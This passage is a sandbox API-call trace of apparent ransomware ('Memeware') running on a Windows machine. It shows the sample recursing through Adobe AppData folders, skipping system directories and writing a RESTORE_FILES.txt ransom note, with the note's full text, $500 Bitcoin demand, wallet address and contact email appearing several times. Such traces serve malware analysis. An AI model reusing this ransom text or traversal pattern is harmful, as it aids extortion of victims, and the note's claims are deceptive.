lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0087.063] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0087.063] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*") returned 78 [0087.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0087.064] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.064] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\.") returned 78 [0087.064] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.064] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.064] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\..") returned 79 [0087.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.064] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0087.064] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\RESTORE_FILES.txt") returned 94 [0087.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.066] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.066] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0087.066] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.067] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0087.067] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.067] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0087.067] CloseHandle (hObject=0x150) returned 1 [0087.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0087.067] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0087.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 87 [0087.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0087.068] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.068] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0087.069] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.069] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.069] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.069] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0087.069] CloseHandle (hObject=0x14c) returned 1 [0087.070] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0087.070] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0087.070] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 82 [0087.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0087.071] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.071] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0087.072] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.072] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0087.072] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.072] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0087.072] CloseHandle (hObject=0xd8) returned 1 [0087.072] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Windows") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="Program Files (x86)") returned -1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="$Recycle.bin") returned 1 [0087.072] lstrcmpiW (lpString1="Linguistics", lpString2="System Volume Information") returned -1 [0087.072] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics") returned 68 [0087.073] lstrcmpW (lpString1="Linguistics", lpString2=".") returned 1 [0087.073] lstrcmpW (lpString1="Linguistics", lpString2="..") returned 1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*") returned 70 [0087.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0087.073] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.073] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.073] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\.") returned 70 [0087.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.073] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.073] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\..") returned 71 [0087.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.073] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.073] lstrcmpiW (lpString1="Dictionaries", lpString2="Windows") returned -1 [0087.073] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files") returned -1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="Program Files (x86)") returned -1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="$Recycle.bin") returned 1 [0087.074] lstrcmpiW (lpString1="Dictionaries", lpString2="System Volume Information") returned -1 [0087.074] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries") returned 81 [0087.074] lstrcmpW (lpString1="Dictionaries", lpString2=".") returned 1 [0087.074] lstrcmpW (lpString1="Dictionaries", lpString2="..") returned 1 [0087.074] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*") returned 83 [0087.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\.") returned 83 [0087.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\..") returned 84 [0087.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.313] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Windows") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Program Files") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Program Files (x86)") returned -1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="$Recycle.bin") returned 1 [0087.313] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="System Volume Information") returned -1 [0087.314] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary") returned 105 [0087.314] lstrcmpW (lpString1="Adobe Custom Dictionary", lpString2=".") returned 1 [0087.314] lstrcmpW (lpString1="Adobe Custom Dictionary", lpString2="..") returned 1 [0087.314] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*") returned 107 [0087.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0087.402] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.402] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.402] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.402] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\.") returned 107 [0087.402] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.402] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.402] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.402] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.402] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\..") returned 108 [0087.402] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.403] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.403] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1="all", lpString2="$Recycle.bin") returned 1 [0087.403] lstrcmpiW (lpString1="all", lpString2="System Volume Information") returned -1 [0087.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all") returned 109 [0087.403] lstrcmpW (lpString1="all", lpString2=".") returned 1 [0087.403] lstrcmpW (lpString1="all", lpString2="..") returned 1 [0087.403] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*") returned 111 [0087.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.403] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.403] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.403] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\.") returned 111 [0087.403] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.403] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.403] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.404] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.404] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\..") returned 112 [0087.404] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.404] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.404] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.404] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.404] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom 